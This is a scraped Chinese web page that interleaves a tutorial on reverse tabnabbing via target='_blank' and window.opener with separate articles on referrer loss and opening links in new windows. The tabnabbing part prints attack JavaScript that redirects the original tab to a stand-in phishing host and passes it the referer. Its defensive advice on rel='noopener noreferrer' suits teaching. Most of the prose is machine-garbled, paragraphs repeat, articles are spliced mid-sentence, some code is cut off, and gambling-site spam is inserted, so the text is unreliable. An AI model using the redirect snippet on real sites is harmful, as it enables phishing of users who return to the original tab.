_blank属性的妙用,javascript操作referer详细解析

危险的 target=”_blank” 与 “opener”

2018/09/05 · JavaScript
· target

初稿出处:
创宇前端   

亚洲必赢官网 1

在网页中采取链接时,假如想要让浏览器自动在新的标签页打开指定的地点,经常的做法就是在
a 标签上添加 target等于"_blank" 属性。

可是,就是其一特性,为钓鱼攻击者带来了可乘之机。

大家都明白 html 超链接标签 href 属性 target=”_blank”
的机能是使打开的链接以新开的窗口格局出现。但是除此之外直接写在 href
标签里面,你还清楚有此外更抢眼的给链接加 target=”_blank”
的不二法门吧?下面小编将要和豪门享用的是怎么着巧妙的选取 href target=”_blank”
那些标签。

Referrer的主要 HTTP请求中有一个referer的报文头,用来指明当前流量的源于参考页。例如在www.sina.com.cn/sports/上点击一个链接到达cctv.com首页,那么就referrer就是www.sina.com.cn/sports/了。在Javascript中,我们可以通过document.referrer来获取同样的信息。通过这么些消息,大家就足以领略访客是从什么渠道来到当前页面的。那对于Web
Analytics来说,是那多少个关键的,这足以告诉大家分化渠道带来的流量的遍布境况,还有用户搜索的首要词等,都是透过分析那个referrer音讯来得到的。

Referrer的主要 HTTP请求中有一个referer的报文头,用来指明当前流量的来源于参考页。例如在www.sina.com.cn/sports/上点击一个链接到达cctv.com首页,那么就referrer就是www.sina.com.cn/sports/了。在Javascript中,大家得以因而document.referrer来获取同样的音信。通过那么些信息,我们就可以驾驭访客是从什么渠道来到当前页面的。这对于Web
Analytics来说,是老大关键的,这足以告知大家分裂渠道带来的流量的分布意况,还有用户搜索的首要词等,都是透过分析这么些referrer音讯来收获的。

起源

第一来探视 target=”_blank” 的用处:

而是,出于各样各个的缘故,有时候Javascript中读到的referrer却是空字符串。上面统计一下如何境况下会丢失referrer。

然则,出于种种各类的因由,有时候Javascript中读到的referrer却是空字符串。上面总计一下哪些情况下会丢失referrer。

parentopener

_blank属性的妙用,javascript操作referer详细解析。在说 opener 之前,可以先聊聊 <iframe> 中的 parent

我们知道,在 <iframe> 中提供了一个用以父子页面交互的对象,叫做 window.parent,大家得以经过 window.parent 对象来从框架中的页面访问父级页面的 window

opener 与 parent 一样,只可是是用来 <a target="_blank"> 在新标签页打开的页面的。通过 <a target="_blank"> 打开的页面,可以一向行使 window.opener 来访问来源页面的 window 对象。

<a href=””
target=”_blank”>php+js 达成瀑布流效果</a>
<form action=””
target=”_blank”>10个不常见却极度实用的PHP函数<input type=”submit”
value=”提交按钮”></form>

修改Location对象开展页面导航 Location对象是一个用以页面导航的万分实用的目标。因为她允许你只变更Url的内部一部分。例如从cn域名切换来com域名,其余一些不变:

修改Location对象进行页面导航 Location对象是一个用以页面导航的可怜实用的对象。因为他同意你只变更Url的里边一些。例如从cn域名切换来com域名,其余一些不变:

同域与跨域

浏览器提供了整机的跨域保养,在域名相同时,parent 对象和 opener
对象实际就一贯是上一流的 window 对象;而当域名差距时,parent
opener 则是透过包装的一个 global 对象。这个 global
对象仅提供极度有限的性质访问,并且在那仅局地多少个属性中,大多数也都是不允许访问的(访问会直接抛出
DOMException)。

亚洲必赢官网 2

在 <iframe> 中,提供了一个 sandbox 属性用于控制框架中的页面的权能,由此即便是同域,也可以决定 <iframe> 的安全性。

 

地点的代码中,如若不加 target=”_blank”
这几个特性,默许均为本页直接打开,即:target=”_self”。

复制代码 代码如下:

复制代码 代码如下:

利用

假若,你的网站上有一个链接,使用了
target="_blank",那么一旦用户点击那么些链接并跻身一个新的标签,新标签中的页面如果存在恶意代码,就可以将你的网站一贯导航到一个冒牌网站。此时,即使用户回到你的标签页,看到的就是被替换过的页面了。

上边说一下怎么会冷不丁想到这些标签的吗!小编网站在那时候规划时,对于链接这一块,没有做太多的想法,所有链接元素打开的方法都是_self。现在才发现存在许多题材,本站自己的内链就不说什么样了,不过发布在文章内容中的链接,多半是指向别人网站的连天,而这个链接也都是向来通过_self格局打开的,那么些问题就来了,用户体验度不好不说,对团结网站的流量,权重都是个挺大的损失。那怎么解决那几个问题呢?我急需的是在网页页面局地落成href 的 target=”_blank” 属性,最终想出了二种办法:

window.location.hostname = “example.com”;

window.location.hostname = “example.com”;

详尽步骤

  1. 在您的网站 https://example.com 上设有一个链接:
&lt;a href="https://an.evil.site"
target="\_blank"&gt;进入一个“邪恶”的网站&lt;/a&gt;

<table>
<colgroup>
<col style="width: 50%" />
<col style="width: 50%" />
</colgroup>
<tbody>
<tr class="odd">
<td><div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-num" data-line="crayon-5b8f6c4939c60150781393-1">
1
</div>
</div></td>
<td><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">
<div id="crayon-5b8f6c4939c60150781393-1" class="crayon-line">
&lt;a href=&quot;https://an.evil.site&quot; target=&quot;_blank&quot;&gt;进入一个“邪恶”的网站&lt;/a&gt;
</div>
</div></td>
</tr>
</tbody>
</table>
  1. 用户点击了这么些链接,在新的标签页打开了那个网站。那些网站可以经过
    HTTP Header 中的 Referer
    属性来判定用户的来源于。并且,这么些网站上带有着接近于那般的 JavaScript
    代码:
const url = encodeURIComponent('{{header.referer}}');
window.opener.location.replace('https://a.fake.site/?' + url);

<table>
<colgroup>
<col style="width: 50%" />
<col style="width: 50%" />
</colgroup>
<tbody>
<tr class="odd">
<td><div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-num" data-line="crayon-5b8f6c4939c6a538489517-1">
1
</div>
<div class="crayon-num crayon-striped-num" data-line="crayon-5b8f6c4939c6a538489517-2">
2
</div>
<div class="crayon-num" data-line="crayon-5b8f6c4939c6a538489517-3">
3
</div>
</div></td>
<td><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;">
<div id="crayon-5b8f6c4939c6a538489517-1" class="crayon-line">
const url = encodeURIComponent('{{header.referer}}');
</div>
<div id="crayon-5b8f6c4939c6a538489517-2" class="crayon-line crayon-striped-line">
window.opener.location.replace('https://a.fake.site/?' + url);
</div>
<div id="crayon-5b8f6c4939c6a538489517-3" class="crayon-line">
 
</div>
</div></td>
</tr>
</tbody>
</table>
  1. 那会儿,用户在两次三番浏览这些新的标签页,而本来的网站所在的价签页此时曾经被导航到了
    https://a.fake.site/?https%3A%2F%2Fexample.com%2F
  2. 恶意网站 https://a.fake.site 按照 Query String
    来充数一个得以欺骗用户的页面,并突显出来(时期还足以做一遍跳转,使得浏览器的地址栏更富有迷惑性)。
  3. 用户关闭 https://an.evil.site
    的标签页,回到原先的网站………………已经回不去了。

上边的口诛笔伐步骤是在跨域的情事下的,在跨域景况下,opener 对象和
parent
一样,是面临限制的,仅提供万分简单的性能访问,并且在那仅局地多少个特性中,半数以上也都是不允许访问的(访问会平昔抛出
DOMException)。

但是与 parent 不相同的是,在跨域的图景下,opener 依旧可以调用
location.replace 方法
parent 则不可以。

一旦是在同域的事态下(比如一个网站上的某一个页面被植入了恶意代码),则意况要比上边严重得多。

(1)给这么些链接一个个手动去丰裕target=”_blank”,但以此法子太笨了,太费时费劲。

而是,通过改动Location进行页面导航的艺术,会导致在IE下丢失Referrer。

可是,通过改动Location进行页面导航的方法,会导致在IE下丢失Referrer。

防御

``<iframe> 中有 sandbox 属性,而链接,则能够利用下边的点子:

(2)在页面 head 标签内加上 <base target=”_blank”>
这一个标签,就一劳永逸了。这一个标签可以使得页面上的有所连接都以新开窗口的花样打开。然则觉得那几个用户体验度很不佳,用户才浏览了多少个网页就打开的全是我的网站了,那会让人很不爽,至少自己是这样觉得的。而且以此在严刻的W3C标准中是不规范的,至于何以?原因很人性化,是因为国外人认为,不经过用户同意,就不管打开新窗口,是不礼貌的,不器重用户的接纳。

IE5.5+ 下重回空字符串

IE5.5+ 下再次回到空字符串

1. Referrer Policy 和 noreferrer

上边的攻击步骤中,用到了 HTTP Header 中的 Referer 属性,实际上可以在
HTTP 的响应头中增添 Referrer Policy 头来有限支撑来源隐衷安全。

Referrer Policy 须求修改后端代码来促成,而在前端,也足以运用 <a> 标签的 rel 属性来指定 rel="noreferrer" 来保障来源隐衷安全。

<a href=”” target=”_blank”
rel=”noreferrer”>进入一个“邪恶”的网站</a>

1
<a href="https://an.evil.site" target="_blank" rel="noreferrer">进入一个“邪恶”的网站</a>

而是要留心的是:即便限制了 referer
的传递,依然不可能阻止原标签被恶意跳转。

那那个时候该如何做吧?

Chrome3.0+,Firefox3.5,Opera9.6,Safari3.2.2均正常再次来到来源网页

Chrome3.0+,Firefox3.5,Opera9.6,Safari3.2.2均正常再次来到来源网页

2. noopener

为了安全,现代浏览器都辅助在 <a> 标签的 rel 属性中指定 rel="noopener",这样,在打开的新标签页中,将不可能再使用 opener 对象了,它为设置为了 null

<a href=”” target=”_blank”
rel=”noopener”>进入一个“邪恶”的网站</a>

1
<a href="https://an.evil.site" target="_blank" rel="noopener">进入一个“邪恶”的网站</a>

搜寻了大气的材料得出 href 标签在 HTML 4.0
扩充了一个新属性:rel,这一个特性用来表明链接和带有此链接页面的关联,以及链接打开的目的。rel 有许多的属性值,比如next、previous,、chapter、section
等等。那里大家得以接纳 rel=”external” 属性。那么原来这么写的代码:

window.open形式打开新窗口 示例:

window.open格局打开新窗口 示例:

3. JavaScript

noopener 属性看似是缓解了所有题目,不过…浏览器的包容性问题…

亚洲必赢官网 3

可以见见,现在多数浏览器都早已相当了 rel="noopener"
属性了。但是,为了掩护稍旧的“近代”浏览器或是很旧的“明代”浏览器如故是“远古”浏览器,唯有
noopener 属性依然远远不够的。

那时候,就只能够请出上边那段原生 JavaScript 来支援了。

“use strict”; function openUrl(url) { var newTab = window.open();
newTab.opener = null; newTab.location = url; }

1
2
3
4
5
6
"use strict";
function openUrl(url) {
  var newTab = window.open();
  newTab.opener = null;
  newTab.location = url;
}

<a href=””
target=”_blank”>右下角弹出广告
js,漂浮效果(包容多浏览器)</a>

复制代码 代码如下:

复制代码 代码如下:

推荐

首先,在网站中的链接上,如果采用了 target="_blank",就要带上
rel="noopener",并且提出带上 rel="noreferrer"。类似于那样:

<a href=”” target=”_blank” rel=”noopener
noreferrer”>进入一个“邪恶”的网站</a>

1
<a href="https://an.evil.site" target="_blank" rel="noopener noreferrer">进入一个“邪恶”的网站</a>

本来,在跳转到第三方网站的时候,为了 SEO 权重,还指出带上
rel="nofollow",所以最后类似于这般:

<a href=”” target=”_blank” rel=”noopener
noreferrer nofollow”>进入一个“邪恶”的网站</a>

1
<a href="https://an.evil.site" target="_blank" rel="noopener noreferrer nofollow">进入一个“邪恶”的网站</a>

如今要写成那样:

<a href=”#”
onclick=”window.open(‘;

<a href=”#”
onclick=”window.open(‘;

性能

最终,再来说说性能问题。

如若网站使用了 <a target="_blank">,那么新开拓的标签页的性能将会影响到当前页面。此时如果新开拓的页面中履行了一个老大巨大的
JavaScript
脚本,那么原始标签页也会遇到震慑,会产出卡顿的风貌(当然未必卡死)。

而只要在链接中参预了
noopener,则此时八个标签页将会互不困扰,使得原页面的属性不会惨遭新页面的熏陶。

1 赞 收藏
评论

亚洲必赢官网 4

<a href=””
rel=”external”>右下角弹出广告 js,漂浮效果(包容多浏览器)</a>

点击此链接会在新窗口打开谷歌网站,大家在地方栏中输入以下js代码就足以看来发送的referrer了。

点击此链接会在新窗口打开谷歌网站,大家在地点栏中输入以下js代码就足以见到发送的referrer了。

那是契合strict标准的办法。可是此地还非得合作一个javascript才使得,相关的代码JS如下:

复制代码 代码如下:

复制代码 代码如下:

function externallinks(){
 if(!document.getElementsByTagName){
  return;
 }
 var anchors=document.getElementsByTagName("a");
 for(var i=0;i<anchors.length;i++){
  var anchor=anchors[i];
  if(anchor.getAttribute("href")&&anchor.getAttribute("rel")=="external"){
   anchor.target="_blank";
  }
 }
}
window.onload=externallinks;

javascript:alert(document.referrer)

javascript:alert(document.referrer)

您可以将上述代码保存成一个.js文件(比如external.js),然后通过外部联接方法调用:

测试结果:

测试结果:

<script type=”text/javascript”
src=”;

IE5.5+ 下回到空字符串

IE5.5+ 下回到空字符串

那般就缓解了在网页页面局地完结 href 的 target=”_blank” 属性的题目了。

Chrome3.0+,Firefox3.5,Opera9.6,Safari3.2.2均正常再次回到来源网页

Chrome3.0+,Firefox3.5,Opera9.6,Safari3.2.2均正常重回来源网页

你或许感兴趣的小说

  • PHP中return 和 exit 、break和contiue 不同与用法
  • JS如何操作css中float属性写法
  • Canonical标签及其成效[网站SEO]
  • MySQL replace函数替换字符串语句的用法
  • iframe属性详细表达
  • 哪些设置DIV层彰显在flash对象之上,包容ie和firefox等浏览器
  • textarea提交内容换行不起功用的解决措施
  • php get_headers函数的功效及用法

html 超链接标签 href 属性
target=”_blank”
的功力是使打开的链接以新开的窗口形式出现。不过除此之外直接写在 href
标签里面,你还知…

借使是同个域名下通过此办法跳转的,那么大家得以经过访问windoww.opener对象去赢得丢失的referrer音信。代码如下:

若果是同个域名下通过此办法跳转的,那么大家可以透过走访windoww.opener对象去获取丢失的referrer新闻。代码如下:

复制代码 代码如下:

复制代码 代码如下:

<script type=”text/javascript”>
    var referrer = document.referrer;
    if (!referrer) {
        try {
            if (window.opener) {
                // IE下一旦跨域则抛出权力极度
                // Safari和Chrome下window.opener.location没有任何性质
                referrer = window.opener.location.href;
            }
        } 
        catch (e) {}
    }
</script>

<script type=”text/javascript”>
    var referrer = document.referrer;
    if (!referrer) {
        try {
            if (window.opener) {
                // IE下假设跨域则抛出权力分外
                // Safari和Chrome下window.opener.location没有任何性质
                referrer = window.opener.location.href;
            }
        } 
        catch (e) {}
    }
</script>

跨域的话则没辙了~

跨域的话则没辙了~

鼠标拖拽打开新窗口 鼠标拖拽是明天极度流行的用户习惯,很多浏览器都置于或者可以因此插件的法门来支撑鼠标拖拽式浏览。不过经过那种方法打开的页面,基本全都丢失referrer。并且,那种场地下,也惊慌失措利用window.opener的艺术去赢得丢失的referrer了。

鼠标拖拽打开新窗口 鼠标拖拽是前些天非常流行的用户习惯,很多浏览器都置于或者可以透过插件的法门来支撑鼠标拖拽式浏览。可是通过那种办法打开的页面,基本全都丢失referrer。并且,那种意况下,也无从利用window.opener的艺术去获得丢失的referrer了。

已测试:

已测试:

Maxthon2.5.2,Firefox的FireGesture插件,Chrome3.0+,Opera9.6,Safari3.2。

Maxthon2.5.2,Firefox的FireGesture插件,Chrome3.0+,Opera9.6,Safari3.2。

点击Flash内部链接 点击Flash上到达别的一个网站的时候,Referrer的情况就相比较散乱了。

点击Flash内部链接 点击Flash上到达其余一个网站的时候,Referrer的气象就比较混乱了。

IE下,通过客户端Javascript的document.referrer读取到的值是空的,不过只要您使用流量监控软件看一下来说,你会发现,实际上HTTP请求中的Referer报文头却是有值的,那说不定是IE已毕的Bug。同时,这些值指向的是Flash文件的地方,而不是发源网页的地址。

IE下,通过客户端Javascript的document.referrer读取到的值是空的,可是只要您选取流量监控软件看一下以来,你会发觉,实际上HTTP请求中的Referer报文头却是有值的,那恐怕是IE达成的Bug。同时,这几个值指向的是Flash文件的地方,而不是来自网页的地点。

Chrome4.0下点击Flash到达新窗口之后,Referrer也是指向的Flash文件的地址,而不是源网页的地方。

Chrome4.0下点击Flash到达新窗口之后,Referrer也是指向的Flash文件的地方,而不是源网页的地方。

Chrome3.0和Safari3.2是相同的,都是会丢失Referrer音信。

Chrome3.0和Safari3.2是同一的,都是会丢失Referrer音讯。

Opera则和Firefox一样,Referrer的值都是发源网页的地方。

Opera则和Firefox一样,Referrer的值都是来自网页的地点。

HTTPS跳转到HTTP 从HTTPS的网站跳转到HTTP的网站时,浏览器是不会发送referrer的。这些各大浏览器的行为是同样的。

HTTPS跳转到HTTP 从HTTPS的网站跳转到HTTP的网站时,浏览器是不会发送referrer的。那些各大浏览器的一坐一起是一致的。

譬如,我们在HTTPS下利用GoogleReader或是Gmail的时候,点击某个链接去到此外一个网站,那么从技术上来说,这样的走访和用户平素键入网址访问是从未什么样分其他。

诸如,大家在HTTPS下使用Google里德(Reade)r或是Gmail的时候,点击某个链接去到其它一个网站,那么从技术上来说,那样的访问和用户直接键入网址访问是不曾怎么分其余。

Referrer丢失对于广告流量监控的熏陶 Referrer如果丢失,Web
Analytics就会舍弃很紧要的一有些新闻了,更加对于广告流量来说,就不可以知晓实际来源了。方今国内众多用了谷歌(Google)Adsense广告的网站,都使用了window.open的章程来打开广告链接,由此IE下会丢失Referrer,而大家通晓,IE是当下市场份额最大的浏览器,由此其震慑是很大的。很多流量统计工具会为此将那部分流量归入“直接流量”,和用户一向键入网址等价了。

Referrer丢失对于广告流量监控的影响 Referrer要是丢失,Web
Analytics就会舍弃很重点的一局地音讯了,更加对于广告流量来说,就不能知晓实际来源了。目前境内不少用了GoogleAdsense广告的网站,都使用了window.open的法子来打开广告链接,因而IE下会丢失Referrer,而我辈领会,IE是眼前市场份额最大的浏览器,由此其震慑是很大的。很多流量总括工具会因此将那部分流量归入“直接流量”,和用户直接键入网址等价了。

对此那样的情况,要求让广告投放者在投放广告的时候,给着陆页面的Url加上一定的跟踪参数。

对于如此的状态,须求让广告投放者在排放广告的时候,给着陆页面的Url加上一定的跟踪参数。

例如,某个Flash广告,点击之后到达的网址是

譬如,某个Flash广告,点击之后到达的网址是

在投放GoogleAdwords的时候,后台系统有一个“自动标记”的选项,当启用此选项的时候,谷歌在风云变幻所有广告的着陆页面Url的时候,就会自行抬高一个gclid的参数,这几个参数可以将谷歌(Google)Analytics后台和Adwords广告后台的数码开展重组。那样就可以领略广告流量对应于哪个广告铺天盖地,哪个广告来源和广告关键词等新闻了。和上边提到的笔触其实是看似的。只不过谷歌自动帮你做了Url的修改了罢了。

在投放GoogleAdwords的时候,后台系统有一个“自动标记”的选项,当启用此选项的时候,谷歌在转移所有广告的着陆页面Url的时候,就会自行抬高一个gclid的参数,那么些参数可以将谷歌Analytics后台和Adwords广告后台的多寡开展组合。那样就足以知晓广告流量对应于哪个广告如拾草芥,哪个广告来源和广告关键词等新闻了。和方面提到的思绪其实是近乎的。只不过谷歌自动帮您做了Url的改动了而已。

IE下referer为空的解决办法 在IE下采用window.location.href方式跳转的话,referer值为空。而在标签里面的跳转的话
referer就不会空。所以,通过以下代码就可以缓解那些IE问题

IE下referer为空的解决办法 在IE下使用
window.location.href格局跳转的话,referer值为空。而在标签里面的跳转的话
referer就不会空。所以,通过以下代码就可以化解那些IE问题

复制代码 代码如下:

复制代码 代码如下:

function gotoUrl(url){
     if(window.VBArray){
         var gotoLink = document.createElement(‘a’);
         gotoLink .href = url;
         document.body.appendChild(gotoLink);
         gotoLink .click();
     }else{
       window.location.href = url;
     }
 }

function gotoUrl(url){
     if(window.VBArray){
         var gotoLink = document.createElement(‘a’);
         gotoLink .href = url;
         document.body.appendChild(gotoLink);
         gotoLink .click();
     }else{
       window.location.href = url;
     }
 }

禁绝浏览器在走访链接时不要带上referer 我们在从一个网站点击链接进去另一个页面时,浏览器会在header里加上Referer值,来标识本次访问的源于页面。不过那种标识有可能会漏风用户的心曲,有时候我不想让其旁人知道我是从何地点击进入的,能或不能有手段可以让浏览器不要发送Referer呢?

禁绝浏览器在造访链接时毫无带上referer 大家在从一个网站点击链接进去另一个页面时,浏览器会在header里加上Referer值,来标识这一次访问的源于页面。可是那种标识有可能会漏风用户的隐衷,有时候自己不想让其余人知道我是从何地点击进入的,能或不能有手段可以让浏览器不要发送Referer呢?

•使用新增的html5的缓解方案,使用rel=”noreferrer”,表明连接的性能为noreferrer,方今只有chrome4+襄助.
•使用当中页面,但实则仍旧发送referrer的,比如利用谷歌的连接转向,noreferrer.js.
•使用javascript协议链接中转,参见上面的说明.

•使用激增的html5的缓解方案,使用rel=”noreferrer”,申明连接的性能为noreferrer,近年来唯有chrome4+襄助.
•使用当中页面,但事实上仍旧发送referrer的,比如动用谷歌的一连转向,noreferrer.js.
•使用javascript共商链接中转,参见下边的表明.

新开一个窗口,相当于target=”_blank”:

新开一个窗口,相当于target=”_blank”:

复制代码 代码如下:

复制代码 代码如下:

function open_window(link){ 
    var arg =
‘\u003cscript\u003elocation.replace(“‘+link+'”)\u003c/script\u003e’;
    window.open(‘javascript:window.name;’, arg);
}
亚洲必赢官网,</CODE>

function open_window(link){ 
    var arg =
‘\u003cscript\u003elocation.replace(“‘+link+'”)\u003c/script\u003e’;
    window.open(‘javascript:window.name;’, arg);
}
</CODE>

转载到一个接连,约等于target=”_self”:

转车到一个连连,约等于target=”_self”:

复制代码 代码如下:

复制代码 代码如下:

function redirect(link){ 
    var arg
=’\u003cscript\u003etop.location.replace(“‘+link+'”)\u003c/script\u003e’;
    var iframe = document.createElement(‘iframe’);
    iframe.src=’javascript:window.name;’;
    iframe.name=arg;
    document.body.appendChild(iframe);
}
</CODE>

function redirect(link){ 
    var arg
=’\u003cscript\u003etop.location.replace(“‘+link+'”)\u003c/script\u003e’;
    var iframe = document.createElement(‘iframe’);
    iframe.src=’javascript:window.name;’;
    iframe.name=arg;
    document.body.appendChild(iframe);
}
</CODE>

HTTP请求中有一个referer的报文头,用来指明当前流量的根源参考页。例如在www.sina.com.cn/sports/上点击一个链接到达cctv.com首页…

你可能感兴趣的稿子:

  • 用PHP伪造referer突破网盘禁止外连的代码
  • VBS伪造HTTP-REFERER的落到实处情势
  • 一对网站允许空白referer的防盗链图片的js破解代码
  • 选择php伪造referer的方式利用referer避免图片盗链
  • 全盘合作各大浏览器获取HTTP_REFERER方法总计
  • 使用JavaScript和C#中获得referer
网站地图xml地图